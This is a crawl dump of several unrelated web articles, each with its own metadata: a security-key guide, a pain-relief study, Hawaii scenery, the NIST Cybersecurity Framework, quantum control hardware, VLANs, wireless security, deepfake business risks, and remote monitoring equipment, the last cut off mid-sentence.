a security key to protect your Mac, as a variant of the "smart card" authentication available since macOS 10.13. They key is required each time you log into your Mac, and it’s a fairly complicated process, and should only be set up by experienced system administrators. It’s worth noting that Google has an Advanced Protection Program for "users with high visibility and sensitive information, who are at risk of targeted online attacks." Designed for journalists, activists, and politicians, this requires the use of a hardware key. Setting up a security key In general, setting up a security key is simple, but it’s not always easy. While Yubico lists many services that support security keys, some of them actually only use the Yubikey via the company’s Yubico Authenticator app to generate one-time codes. While using the key is slightly more secure than generating a code with an authenticator app, it’s probably not worth the extra step. Google doesn’t provide much information on how to use their Titan Security Key, other than what you will find for setting up your Google account. But Google’s instructions are a good way to see how this works, and most services have similar procedures to add a security key to your account. If you haven’t yet turned on two-factor authentication for your account, then you must do so; the security key is the second factor. If you already have two-factor authentication enabled, then you’ll want to add the security key and turn off text messaging if you had that enabled. You then "enroll" your security key; as you see in the screenshot below, I could use my iPhone as a security key, but if you click the second option, you can add a hardware key. You then connect the security key, and Google registers it, and that’s all there is to do. It’s worth noting that to be able to use a Bluetooth security key on other devices, you need to first connect it physically to a computer when enrolling it, using the supplied cable. After that, you can use the device via Bluetooth to log in on an iPhone or iPad: just press a button on the Bluetooth security key when asked when logging in. Not all services allow you to use multiple security keys, but Google does, and this can be practical to ensure you have backups. With some services, you can choose to have multiple authentication methods active. For example, Twitter allows you to use text messages, an authenticator app, and/or a security key, but notes that you can’t use a security key with their mobile app. There are risks that these hardware devices may not work, because the device you’re using to log in isn’t compatible, or because you’ve lost the security key. Most services that offer two-factor authentication with an authenticator app or security key also provide backup codes, which you can use if your preferred method isn’t available. With some services, such as on Twitter, this is a single code, in others, such as Google, you get ten single-use codes; once you’ve used a code, you can’t use it again (but you can always generate new codes). But if, as above, you can use both a security key and an authenticator app with Twitter, it might be best to allow both options. Computer security is always a trade-off between robustness and convenience. While a hardware security key is one of the most secure ways of protecting your accounts, it is not the most convenient. But that extra step is generally something you only need to do occasionally: unless you log into public or shared computers often, you use them only when you log into a new device, or every month or so, depending on how often the service wants to you reconfirm your identity.
<urn:uuid:70f457cd-bd28-48d5-a01e-cf2c3a56830c>
CC-MAIN-2022-40
https://www.intego.com/mac-security-blog/how-to-use-a-security-key-to-protect-sensitive-online-accounts/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00333.warc.gz
en
0.936778
1,843
2.609375
3
Is pain treatment more helpful if it is provided by a friend, or is the help of a stranger better? A study conducted by researchers from the Universities of Wuerzburg, Amsterdam and Zurich investigated this question and found that people experience stronger pain relief if they are treated by a person from a different social group. The study has been published in the latest issue of the Royal Society of London B: Biological Sciences. It was led by Grit Hein, a psychologist, neuroscientist and professor of Translational Social Neuroscience at the Center of Mental Health of the Würzburg University Hospital who teamed up with Jan B. Engelmann (Amsterdam) and Philippe N. Tobler (Zurich). “Participants experienced induced pain on the back of their hand. In one group of participants, this pain was relieved by a person from their own social group, and another group of participants received pain relief from a person from a different group. We measured how the pain relief treatment changed neural pain responses and subjective pain judgments.” Grit Hein describes the scientists’ approach. Treatment by a stranger was more efficient “Before the treatment, both groups showed similarly strong responses to pain,” Grit Hein explains. “In contrast, after being treated by what they considered a ‘stranger,” the participants from this group rated their pain less intense than the other group. The effect was not limited to the subjective pain experience: “We also saw a reduction of the pain-related activation in the corresponding brain regions,” the scientist says. Perhaps surprising to the lay person, the finding is in line with a core principle of learning theory according to which people learn particularly well when the results differ significantly from what they had expected. This is called “prediction error learning” in psychological language, in which the surprise contributes to “rooting” the new experience more effectively in the brain. “The participants who received pain relief from an outgroup member had not expected to actually get effective help from this person,” the neuroscientist explains. And the less the participants had anticipated positive experiences, the bigger their surprise when the pain actually subsided and the more pronounced the reduction of their pain responses. “Of course, this finding still needs to be verified outside the laboratory,” says Grit Hein. ” But it could be relevant for the clinical context, where treatment by nurses and doctors from different cultures is common today.” More information: Pain relief provided by an outgroup member enhances analgesia, Proceedings of the Royal Society B, rspb.royalsocietypublishing.or … .1098/rspb.2018.0501 Journal reference: Proceedings of the Royal Society B search and more info website Provided by: University of Würzburg
<urn:uuid:6a769c4b-8f29-4737-8f1b-3a922d2f8faf>
CC-MAIN-2022-40
https://debuglies.com/2018/09/26/people-experience-stronger-pain-relief-if-they-are-treated-by-a-person-from-a-different-social-group/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00333.warc.gz
en
0.94685
603
2.65625
3
2Pololu Valley Cliffs 3Trail View of the Pololu Valley 4Petroglyphs Found in Hawaii Volcanoes National Park The Pu’u Loa Petroglyphs, known as “kii pohaku” in Hawaiian, are lava rock carvings made by Native Hawaiians, according to the HVCB. The largest group of these artifacts is found in the Hawaii Volcanoes National Park, where more than 23,000 images are visible. Here are some of the lava outcrops that can be observed along the path to the petroglyphs field. 5Carving in Solidified Lava 6More Petroglyphs Carved Into Rock Outcroppings 7Sunset on a Beach on the Big Island 8Smooth Sands of Hapuna Beach 9Tranquil Bay at Hapuna Beach 10Waves Cresting at Hapuna Beach 11Kau Forest Reserve Not all of Hawaii is beaches and waves. In the Kau Forest Reserve, a critical watershed is present that provides fresh water for residents, according to the HVCB. The forest includes a native ecosystem for endangered indigenous birds and plants. There are no designated state-managed hiking trails in this forest, so visitors are able to see it through Google Street View. 12Rim of a Crater On the challenging 11-mile Crater Rim Trail in the Hawaii Volcanoes National Park, visitors can explore an active volcano and see spectacular views like this one of the rim of the crater. Much of the trail is closed due to volcanic activity in Halemaumau crater, according to the HVCB, but visitors are able to see lots of wildlife and amazing scenery. 13Hardened Lava Rock Flows 14Volcano Crater on the Kilauea Iki Trail This huge volcano crater dominates this scene on the Kilauea Iki Trail in the Hawaii Volcanoes National Park, where good hiking shoes will be needed by those who want to take on the challenging trail, according to the HVCB. The trail descends 400 feet to the crater floor, where steam vents and the Puu Puai cinder cone are also visible. 15Lava Rock on the Kilauea Iki Trail 16Hawaii’s Largest Cinder Cone 17This Isn’t Africa In the Hakalau Forest National Wildlife Refuge, the flora and fauna of a native Hawaiian forest can be explored, provided you have reservations when you visit, according to the HVCB. In this image, it doesn’t look like a lush forest that one might expect to find in Hawaii, but appears to be a dry forest that might be found in Africa. 18442-Foot Akaka Falls Located in Akaka Falls State Park on the northeastern Hamakua Coast of Hawaii, the 442-foot-high Akaka Falls provides a breathtaking backdrop for a visit to the area, as shown in this spectacular image. Visitors travel through a lush rain forest to reach the falls, according to the HVCB, where they can also visit the nearby 100-foot Kahuna Falls.
<urn:uuid:8b500a94-cf27-406d-87c7-764b1bb1962f>
CC-MAIN-2022-40
https://www.eweek.com/cloud/google-street-view-captures-hawaiian-beaches-spectacular-scenery/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00333.warc.gz
en
0.908604
666
3.234375
3
NIST Cybersecurity Framework NIST Cybersecurity Framework What is the NIST Cybersecurity Framework? The National Institute of Standards and Technology (NIST) is a non-regulatory agency that promotes innovation by advancing measurement science, standards, and technology. The NIST Cybersecurity Framework (NIST CSF) consists of standards, guidelines, and best practices that help organizations improve their management of cybersecurity risk. The NIST CSF is designed to be flexible enough to integrate with the existing security processes within any organization, in any industry. It provides an excellent starting point for implementing information security and cybersecurity risk management in virtually any private sector organization in the United States. History of the NIST Cybersecurity Framework On February 12, 2013, Executive Order (EO) 13636—"Improving Critical Infrastructure Cybersecurity"—was issued. This began NIST’s work with the U.S. private sector to "identify existing voluntary consensus standards and industry best practices to build them into a Cybersecurity Framework." The result of this collaboration was the NIST Cybersecurity Framework Version 1.0. The Cybersecurity Enhancement Act (CEA) of 2014 broadened NIST's efforts in developing the Cybersecurity Framework. Today, the NIST CSF is still is one of the most widely adopted security frameworks across all U.S. industries. NIST Cybersecurity Framework core structure NIST Cybersecurity Framework includes functions, categories, subcategories, and informative references. Functions give a general overview of security protocols of best practices. Functions are not intended to be procedural steps but are to be performed “concurrently and continuously to form an operational culture that addresses the dynamic cybersecurity risk.” Categories and subcategories provide more concrete action plans for specific departments or processes within an organization. Examples of NIST functions and categories include the following: - Identify: To protect against cyberattacks, the cybersecurity team needs a thorough understanding of what are the most important assets and resources of the organization. The identify function includes such categories as asset management, business environment, governance, risk assessment, risk management strategy, and supply chain risk management. - Protect: The protect function covers much of the technical and physical security controls for developing and implementing appropriate safeguards and protecting critical infrastructure. These categories are identity management and access control, awareness and training, data security, information protection processes and procedures, maintenance, and protective technology. - Detect: The detect function implements measures that alert an organization to cyberattacks. Detect categories include anomalies and events, security continuous monitoring, and detection processes. - Respond: The respond function categories ensure the appropriate response to cyberattacks and other cybersecurity events. Specific categories include response planning, communications, analysis, mitigation, and improvements. - Recover: Recovery activities implement plans for cyber resilience and ensure business continuity in the event of a cyberattack, security breach, or other cybersecurity event. The recovery functions are recovery planning improvements and communications. The NIST CSF's informative references draw direct correlation between the functions, categories, subcategories, and the specific security controls of other frameworks. These frameworks include the Center for Internet Security (CIS) Controls®, COBIT 5, International Society of Automation (ISA) 62443-2-1:2009, ISA 62443-3-3:2013, International Organization for Standardization and the International Electrotechnical Commission 27001:2013, and NIST SP 800-53 Rev. 4. The NIST CSF does not tell how to inventory the physical devices and systems or how to inventory the software platforms and applications; it merely provides a checklist of tasks to be completed. An organization can choose its own method on how to perform the inventory. If an organization needs further guidance, it can refer to the informative references to related controls in other complementary standards. There is a lot of freedom in the CSF to pick and choose the tools that best suit the cybersecurity risk management needs of an organization. NIST Framework implementation tiers To help private sector organizations measure their progress towards implementing the NIST Cybersecurity Framework, the framework identifies four implementation tiers: - Tier 1 – Partial: The organization is familiar with the NIST CSF and may have implemented some aspects of control in some areas of the infrastructure. Implementation of cybersecurity activities and protocols has been reactive vs. planned. The organization has limited awareness of cybersecurity risks and lacks the processes and resources to enable information security. - Tier 2 – Risk Informed: The organization is more aware of cybersecurity risks and shares information on an informal basis. It lacks a planned, repeatable, and proactive organization-wide cybersecurity risk management process. - Tier 3 – Repeatable: The organization and its senior executives are aware of cybersecurity risks. They have implemented a repeatable, organization-wide cybersecurity risk management plan. The cybersecurity team has created an action plan to monitor and respond effectively to cyberattacks. - Tier 4 – Adaptive: The organization is now cyber resilient and uses lessons learned and predictive indicators to prevent cyberattacks. The cybersecurity team continuously improves and advances the organization’s cybersecurity technologies and practices and adapts to changes in threats quickly and efficiently. There is an organization-wide approach to information security risk management with risk informed decision-making, policies, procedures, and processes. Adaptive organizations incorporate cybersecurity risk management into budget decisions and organizational culture. Establishing a NIST Framework cybersecurity risk management program The NIST Cybersecurity Framework provides a step-by-step guide on how to establish or improve their information security risk management program: - Prioritize and scope: Create a clear idea of the scope of the project and identify the priorities. Establish the high-level business or mission objectives, business needs, and determine the risk tolerance of the organization. - Orient: Take stock of the organization’s assets and systems and identify applicable regulations, risk approach, and threats to which the organization might be exposed. - Create a current profile: A current profile is a snapshot of how the organization is managing risk at present, as defined by the categories and subcategories of the CSF. - Conduct a risk assessment: Evaluate the operational environment, emerging risks, and cybersecurity threat information to determine the probability and severity of a cybersecurity event that can impact the organization. - Create a target profile: A target profile represents the risk management goal of the information security team. - Determine, analyze, and prioritize gaps: By identifying the gaps between the current and target profile, the information security team can create an action plan, including measurable milestones and resources (people, budget, time) required to fill these gaps. - Implement action plan: Implement the action plan defined in Step 6. NIST CSF and the IBM Cloud IBM has many resources available about how to adopt the NIST Cybersecurity Framework. IBM also provides a variety of security framework and risk assessment services to help assess an organization's security posture. Businesses can use IBM’s security framework and risk assessment services to help identify vulnerabilities to mitigate risks. These services provide network monitoring and management and enhance privacy, security options, and identification of security risks. IBM also can help align security standards and practices to the NIST CSF in a cloud environment. Sign up for an IBM ID and create an IBM Cloud account.
<urn:uuid:84f726a9-e004-48c5-9fc6-d99a44649a20>
CC-MAIN-2022-40
https://www.ibm.com/cloud/learn/nist-cybersecurity-framework
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00333.warc.gz
en
0.896794
1,500
2.890625
3
Microsoft’s Pioneering Quantum Hardware Allows for Controlling up to Thousands of Qubits at Cryogenic Temperatures (Microsoft) Quantum computing offers the promise of solutions to previously unsolvable problems, but in order to deliver on this promise, it will be necessary to preserve and manipulate information that is contained in the most delicate of resources: highly entangled quantum states. One thing that makes this so challenging is that quantum devices must be ensconced in an extreme environment in order to preserve quantum information, but signals must be sent to each qubit in order to manipulate this information—requiring, in essence, an information superhighway into this extreme environment. Microsoft’s David Reilly, leading a team of Microsoft and University of Sydney researchers, has developed a novel approach to the latter problem. Rather than employing a rack of room-temperature electronics to generate voltage pulses to control qubits in a special-purpose refrigerator whose base temperature is 20 times colder than interstellar space, they invented a control chip, dubbed Gooseberry, that sits next to the quantum device and operates in the extreme conditions prevalent at the base of the fridge. They’ve also developed a general-purpose cryo-compute core that operates at the slightly warmer temperatures comparable to that of interstellar space, which can be achieved by immersion in liquid Helium. This core performs the classical computations needed to determine the instructions that are sent to Gooseberry which, in turn, feeds voltage pulses to the qubits. These novel classical computing technologies solve the I/O nightmares associated with controlling thousands of qubits. Microsoft Quantum researchers are playing the long game, using a wholistic approach to aim for quantum computers at the larger scale needed for applications with real impact. Aiming for this bigger goal takes time, forethought, and a commitment to looking toward the future. In that context, the challenge of controlling large numbers of qubits looms large, even though quantum computing devices with thousands of qubits are still years in the future. They’ve also extended this research to create the first-of-its-kind general-purpose cryo-compute core, one step up the quantum stack. This operates at around 2 Kelvin (K), a temperature that can be reached by immersing it in liquid Helium. Although this is still very cold, it is 20 times warmer than the temperatures at which Gooseberry operates and, therefore, 400 times as much cooling power is available.
<urn:uuid:afaa12c1-41d6-4f85-b81c-cd2baf22f48f>
CC-MAIN-2022-40
https://www.insidequantumtechnology.com/news-archive/microsofts-pioneering-quantum-hardware-allows-for-controlling-up-to-thousands-of-qubits-at-cryogenic-temperatures/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00333.warc.gz
en
0.921165
500
3.421875
3
In this lesson we will take a look at VLANs (Virtual LANs) and I will explain what they are and why we need them. First of all let me show you a picture of a network: Look at this picture for a minute, we have many departments and every department has its own switch. Users are grouped physically together and are connected to their switch. what do you think of it? Does this look like a good network design? If you are unsure let me ask you some questions to think about: - What happens when a computer connected to the Research switch sends a broadcast like an ARP request? - What happens when the Helpdesk switch fails? - Will our users at the Human Resource switch have fast network connectivity? - How can we implement security in this network? Now let me explain to you why this is a bad network design. If any of our computers sends a broadcast what will our switches do? They flood it! This means that a single broadcast frame will be flooded on this entire network. This also happens when a switch hasn’t learned about a certain MAC address, the frame will be flooded. If our helpdesk switch would fail this means that users from Human Resource are “isolated” from the rest and unable to access other departments or the internet, this applies to other switches as well. Everyone has to go through the Helpdesk switch in order to reach the Internet which means we are sharing bandwidth, probably not a very good idea performance-wise. Last but not least, what about security? We could implement port-security and filter on MAC addresses but that’s not a very secure method since MAC addresses are very easy to spoof. VLANs are one way to solve our problems. One more question I’d like to ask you to refresh your knowledge: - How many broadcast domains do we have here? What about broadcast domains? We didn’t talk about this before but I think you can answer it. If a computer from the sales switch would send a broadcast frame we know that all other switches will forward it. Did you spot the router on top of the picture? What about it…do you think a router will forward a broadcast frame?
<urn:uuid:a4c8f272-d6a4-4438-a739-2b6f849011bd>
CC-MAIN-2022-40
https://networklessons.com/cisco/ccie-routing-switching/introduction-to-vlans
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00333.warc.gz
en
0.960748
464
3.375
3
The beauty of wireless communication is that it frees the user from the limited reach of wires or a dock. Mobile data systems pass information from mobile devices in remote locations to the enter¬prise data center via radio waves in “free space.” This area in the middle, between the device and host, is where the information is transported or communicated. This layer must be secured as well. As there are no physical boundaries to prevent intruders from intercepting data in free space, wire¬less communication security must protect the packets of data being transmitted; ensuring that only those for whom they are intended can read them. This is accomplished through “secure tunnels.” Just as there are many ways to build physical tunnels, there is more than one way to create wireless tunnels. Here are the basic building blocks of creating a secure tunnel: • User Authentication – Determining that the network users are who they claim to be. Authentication allows access to users based on certain credentials, and verifies that a third party has not altered data sent between two users • Encryption – Encoding data before it is transmitted and delivering it in a way that can be quickly deciphered by the authenticated receiver. Encryption allows sensitive information to traverse a public network without compromising confidentiality • Message Authentication – Proof that messages, encrypted or otherwise, have not been tampered with or replayed (sent multiple times to cause havoc) between the sender and • Access Control – Blocking unwanted user access to an internal network or service. This restricts the user to the tools that are designated only for them. Access control is typically achieved through authentication. When it comes to wireless security, one size certainly does not fit all. The type of security deployed for WLANs can be very different from those designed for other wireless technologies such as GPRS, Bluetooth and RFID. Companies securing wireless LANs primarily are concerned about data theft, such as potential intruders driving by the facility or in the parking lot, trying to pick up the company’s wireless signal and possibly gaining access to the network. “Man-in-the-middle” attacks — where a thief captures data packets and routes them to other servers for his own purposes – are another mode of data theft. Recommended means for securing a WLANs include WPA, WPA2, virtual private networks (VPNs) or security gateways or firewalls. WPA (Wi-Fi Protected Access) WPA is a powerful, standards-based, interoperable security technology for 802.11-based, Wi-Fi networks. It provides strong data protection by using encryption as well as access controls and user authentication. WPA utilizes 128-bit encryption keys and dynamic session keys to ensure wireless network privacy and enterprise security. WPA2 (Wi-Fi Protected Access 2) WPA2 is the certified interoperable version of the full IEEE 802.11i specification, which was rati¬fied in June 2004. WPA2 supports 802.1x/EAP authentication and includes AES or Advanced Encryption Standard. It provides a very high level of assurance that only authorized users are accessing the WLAN network. Virtual Private Networks (VPNs) Most major corporations today use VPNs to protect remote-access workers and their connec¬tions. VPNs create a secure “tunnel” from the end-user’s computer, through the end-user’s ac¬cess point or gateway, on through the Internet and all the way to the corporation’s servers and systems. VPNs also can be implemented within local area wireless networks to protect transmis¬sions from WLAN-equipped computers to corporate servers and systems. Most corporate IT departments are already skilled with VPN technology and can modify exist¬ing systems to support WLAN networks. A VPN works through a designated VPN server at the company headquarters and creates an encryption scheme for data transferred to computers outside the corporate offices. VPN software on the remote computer uses the same encryption scheme, enabling the data to safely be transferred back and forth with no chance of intercep¬tion. The wireless market currently is split between the two distinct types of VPNs — IPSec (IP security) and SSL (Secure Sockets Layer) technologies. Enterprises can further control access of mobile devices to various back-end resources, such as SAP, ERP databases and financial records, through gateway servers. Gateways can be config¬ured to allow mobile devices to access only required services, while preventing access to the greater Internet. In addition, gateways can be configured to block specific mobile devices from network access if reported as lost or stolen. Network firewalls can make a network appear invisible to Internet traffic and can block unau¬thorized users from accessing files and systems. Hardware and software firewall systems moni¬tor and control the flow of data in and out of computers in the wired and wireless enterprise, businesses and home networks. They can be set to intercept, analyze and stop a wide range of Internet intruders and hackers. Many levels of firewall technology are available, including software only or powerful hardware and software combinations. Some WLAN gateways and access points provide built-in firewall capability, but even if they don’t, most WLAN gateways include a routing capability that acts like a basic firewall, making the networked computers and their data invisible to hacking scans and probes. Wide Area Wireless Communication Security Wide area wireless technologies such as CDMA, GSM, and GPRS act as bearers or pipelines for the information to be sent and received by the company network. As a safety precaution, com¬panies should only allow network communication with wide area signals that are encrypted by SSL or IPSec. In addition, network access should only be granted to authenticated users. Internet protocol-based VPNs provide the tunneling and encryption required for business users to safely access their critical applications over wide area connections, using IPSec to ensure the privacy of data traveling over the public Internet. As businesses support more remote users, VPNs can be designed to support high network availability, ensuring that mission-critical data arrives on time. Additionally, IP-based VPNs can be deployed and integrated easily with existing network infrastructures, enabling enterprises to scale operations to meet the expanding demand for remote access. Since the technology’s inception, strong security measures have been available for Bluetooth to ensure safe use. The Bluetooth specification provides methods to uniquely bond devices in one-to-one relationships using PIN numbers to identify and verify a particular Bluetooth device. Once bonded, a Bluetooth device may be set to “undiscoverable” mode, thus preventing other Bluetooth devices from “seeing” it during the discovery process and accessing or sending data. These capabili¬ties — called pairing (discovery of another Bluetooth device) and bonding (sharing of a PIN key for authentication) — provide for Bluetooth device authentication. Bluetooth extends device authen¬tication security to protection of transmitted data through the optional use of a 128-bit encryption key for transmitted data. Educating users to deny requests to pair with a Bluetooth device if the requestor is unknown can eliminate many Bluetooth security breaches. This can become a non-issue by setting the Bluetooth terminal to “undiscoverable” once paired with the intended Bluetooth peripheral. From an industry perspective, transmission of highly sensitive data over a Bluetooth link – such as funds transfer transactions — is not recommended. RFID Security Issues Often, the data stored on an RFID tag is of a public nature and product related, such as UPC/EPC codes or product descriptions. Generally these descriptions also are copied in human and machine-readable format on printed barcodes. This kind of data requires low or no security. Companies using RFID technology in other, more security-sensitive environments must protect the data when it is in transit – from the RFID tag to the reader and from the reader to the network. To ensure confidentiality, data should be encrypted as it is written to the tag. As an additional security measure, part of the data area on a tag may be used to store a crypto¬graphic signature, such as an SHA-1 cryptographic hash, which verifies that the rest of the data reported has not been tampered with. Some or all of the reported data also may be encrypted. Data on RFID tags also can be “locked” to prevent anyone from changing or erasing it. RFID readers connect to the network in the same way as other network devices, and should be secured in the same manner. Whether the reader-to-network connection is wired or wireless, the precautions described in the device security section above should be implemented. Also, beware that network access control security and financial transactions are better handled with Smart Cards and biometrics; both technologies are superior to RFID at thwarting remote eavesdropping and copying.
<urn:uuid:95996704-7ee7-4e3f-9081-18985c61b9bf>
CC-MAIN-2022-40
https://it-observer.com/securing-wireless-technology-communication-part-ii.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00333.warc.gz
en
0.913698
1,875
3.65625
4
The “fake news” label is often applied in response to a news story that is presenting information not favorable to the subject of the story. Sometimes the news is true — sometimes it’s fake. However, the over-usage of the term obscures the real danger posed by increasingly sophisticated deepfake videos. Deepfakes leverage deep-learning technology, a branch of artificial intelligence (AI), and effectively learn what a person’s face looks like at different angles with the purpose of superimposing that likeness onto another person. Deepfakes’s AI algorithms can take in large amounts of data (photos of a person’s face, voice samples, etc.), and from it, create audio and video of a person doing or saying things they've never done. The technology can even go so far as to match physical mannerisms to audio and video, replicating an original speaker’s lip and mouth movements. Fake news and deepfakes aren’t just restricted to any political party, country, or specific affiliation either. The most widely read and distributed fake news story of 2016 was a post that claimed the Pope had endorsed Trump; later, the identical story was published claiming the Pope had endorsed Clinton. Collectively, we may be suspicious of random postings on Facebook or Twitter, but a video of an event is more likely to be trusted. If we see and hear it, then we have “proof.” For this reason, fake videos are more dangerous than fake news. Lately, there has been an escalation of selective editing, but often, those can be “debunked” by sharing the unedited video. When deepfake technology is used to create a new video, larger problems arise. Unlike editing that cuts out a key part of an answer, if there is no video of the original event, then it might be hard to counter a deepfake. If it is convincing, it will be harder yet to prove it’s not real. Additionally, in our current information consumption model, videos often get wider circulation and are more easily shared and more memorable. We have become cynical about the biases a media outlet may apply to a report, but we think that an unedited video is the only authority that we can trust — until now. In the pollical world, many people will accept a deepfake video without question because it supports their point of view. But a different element of trust and suspicions exist in the business world. Even as hacking and phishing continue to get more sophisticated (and continue to work), when AI is used in combination with social hacking, it opens an entirely new pandora’s box. One of the first cases of financial fraud using deepfake technology involved AI-synthesized audio that recreated the voice of the general director of the company. Using the fake phonograms, the actor managed to convince an employee to transfer 220,000 euros to their bank account. The number of possible exploits is only limited by the imagination of the nefarious actor. A sample of the more obvious includes: - False claims of malfeasance, damaging a product or company’s reputation - Endorsements that are not real (you thought fake written reviews were harmful) - Video-backed HR complaints about a co-worker or a boss - Insurance fraud, support by “video proof” - False news about the company’s owners, founders, leaders, etc. - Onboarding processes subverted and fraudulent accounts created - Identity theft, using video to convince someone to alter critical personal data - Diversion of shipments - Orders for unwanted materials - Payments and/or funds transfer fraudulently authorized - Blackmail based on the threat to release a damaging video Some of the events don’t have to be believed for very long to have a significant impact. In a deepfake extortion scenario, the authenticity of the defamatory video will be irrelevant; the potential damage will be just as significant to the individual and/or corporate reputation. This could be monetized by someone selling a stock short just before some the bad news comes to light. It only takes a believable rumor to have real impacts on businesses and individuals, and recovering from a false story will take even longer if the casual observer can not tell it is a hoax. Detecting fake videos has been a challenge for quite some time. Rising Sun, both a book by Michael Crichton (1992) and a movie (1993), foreshadowed how a video can be faked. In this fictional story, a video was altered to frame someone for murder. One scene in particular showed how easy it had become to replace the face of one person with that of another — and this was over 25 years ago! Detecting fake videos now will not be as simple as close observation of a misplaced shadow, a shifted camera view, or a background lighting inconsistency. AI-backed machine learning techniques are being used to spot detectable problems and improve the quality of the deepfake. Most cybersecurity experts are promoting AI technologies to detect irregularities in the operation of computer systems and networks. Similarly, AI is currently one of the best tools to fight deepfakes by trying to detect anomalies. But like many challenges in the world of security, it feels like we will usually be a step behind the black hats. Should you be personally worried? Think of something that you would never say, and then imagine your friends, family, or employer being shown a (convincing) video of you saying it. The potential malicious misuse could be a problem for all companies and all of us individually. "SCTC Perspective" is written by members of the Society of Communications Technology Consultants, an international organization of independent information and communications technology professionals serving clients in all business sectors and government worldwide. Knowing the challenges many enterprises are facing during COVID-19, the SCTC is offering to qualified members of the Enterprise Connect user community a limited, pro bono consulting engagement, approximately 2-4 hours, including a small discovery, analysis, and a deliverable. This engagement will be strictly voluntary, with no requirement for the user/client to continue beyond this initial engagement. For more information or to apply, please visit us here.
<urn:uuid:5f9e629e-ad03-4c3f-858f-f99e6c134972>
CC-MAIN-2022-40
https://www.nojitter.com/security/real-business-impacts-deepfakes
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00333.warc.gz
en
0.943142
1,298
3.1875
3
A remote monitoring tool is any hardware or software (or a combination) that helps you keep track of your remote resources. As networks grow, network resources are distributed in different locations to support the network, and, since there's a limited number of you, you need something to help you keep tabs on your network when you're not around. This is where remote monitoring tools come in. Typically, remote monitoring tools exist in a hierarchy, from the sensors at your sites actually monitoring equipment at your sites, to the master station, which consolidates all of the remote monitoring information to provide you with a total network view in a single interface. Lower-level remote monitoring components, discrete alarms, analog sensors, and control relays, are run through a remote telemetry unit (RTU), and the RTUs report to an alarm master. (In large, highly sophisticated networks, RTUs may be run through master stations to a "top-level" master. This introduction to remote monitoring tools will not explore a network with that level of sophistication.) Monitoring your network hardware is typically done with a combination of discrete points and analog sensors. They set "alarms" to indicate that something has gone wrong or outside a normal range. Discrete alarms issue a certain voltage when a condition has been achieved, providing a binary alert. They provide on-off, open or closed, connected or disconnected sort of alarm reporting. Often, these points can be databased within an RTU or a master station with various levels of importance - critical, major, and minor - to help provide more sophisticated alarm reporting. Analog sensors measure a range of current or voltage and interpret their readings based on a reference, effectively measuring temperature, fuel level, pressure, and a number of other factors. Analogs typically don't monitor your equipment, because most equipment won't indicate how well it's working, but rather the environment and other factors related to your equipment that are equally important. For example, if the temperature at a remote site rises above the set-temperature for your HVAC equipment, you know that your air conditioning systems aren't working properly. (And, obviously, if the temperature rises too high, you'll likely face equipment failure.) Both types of inputs are found on Remote Telemetry Units (RTUs), a standard remote monitoring tool that essentially acts as your eyes, ears, and, in some cases, hands onsite. RTUs usually sit inline with other rack-mounted equipment, monitoring the above types of inputs, collecting the data, and notifying you when an alarm condition occurs. Sophisticated RTUs, like the NetGuardian series from DPS Telecom, can monitor up to 64 discrete inputs and up to 8 analog inputs per unit, with expansions available to increase capacity, so you can monitor even your largest remote sites. They also offer notifications for alarms in a number of convenient ways, so that you can keep track of your remote resources from wherever you are. They'll send email, text, pager, and, with an accessory, voice notifications, so you aren't stuck watching a terminal full of scrolling text to keep track of your sites; you can keep a close watch on things from your smartphone or laptop. For added benefit, some of the better RTUs out there also offer control relays, simple circuits that perform a function upon closing (or, in some cases, opening) the circuit. Control relays provide a small measure of control at remote sites, preventing you from making an otherwise unnecessary trip to a site, to flip on a generator or turn on air conditioning equipment. The NetGuardian series also allows you to derive controls from your discrete or analog alarms, so when an alarm value occurs that can be easily rectified by operating a control, the RTU will take care of it without bothering you about the situation. RTUs can also be ordered with a number of additional features to suite your monitoring needs. DPS Telecom's NetGuardian series can often be ordered with terminal server ports, allowing for access to your serial only devices over LAN, preventing trips to sites just to access equipment. Some can be ordered with a 10/100BaseT switch, so you can extend LAN access at a site without setting up additional equipment. Remember, your remote monitoring tools exist to keep you away from the sites, so you can keep your network running optimally and spend less time traveling; when you look at RTUs, it would be wise to consider these and other features that can help you do that. As a remote monitoring tool, the RTU will also offer some form of interface you can access remotely. In some cases this is a simple terminal interface, operated with a series of commands that you'll have to remember in order to access your remote monitoring data. In the case of DPS Telecom's NetGuardians, it's a fully-featured web-browser interface. You can simply open a web browser and punch in the IP address of the RTU to see alarms at your sites or database your alarm points. It's important that the information from your remote monitoring tools is easily accessible and interpretable. As your network grows, it becomes increasingly necessary to consolidate the information your RTUs feed you to a single interface, so when you receive an alarm notification, you don't have waste time or energy attempting to remember which point is associated with which IP address at which site just to investigate the alarm. An alarm master station is a remote monitoring tool that does just this: it aggregates all your alarm data and displays everything on a single interface. Your prime criteria for selecting an alarm master should be that it consolidates information from all of your equipment, regardless of protocol. Whether you have equipment working in legacy, proprietary, or any variety of protocols, your alarm master station needs to be able to capture everything, so you don't have to go outside the interface to see your alarms. Outside of that, the top-level remote monitoring tool must be both accessible and have an easily navigable interface, so you can keep in touch with your master from wherever you are, and you don't have to fumble through a clumsy interface when you need to access it. T/Mon, DPS Telecom's alarm master station fulfills both criteria handily. T/Mon provides three different interfaces, each designed to fulfill a specific monitoring need and each accessible remotely or locally. It has a standard terminal interface, which is designed for maximum usability. It is responsive and extremely powerful, designed for the power user who will database alarm points and monitor the unit. It also offers a web 2.0 interface that allows for quick access to alarm statuses, so you can quickly access your alarm database while on the go. But the real draw is the new T/GFX map-based, graphical interface. T/GFX allows you to distribute your alarms on a map, so when any of your remote monitoring tools indicates a problem, you can see exactly where the problem has occurred geographically, so you no longer have to waste time 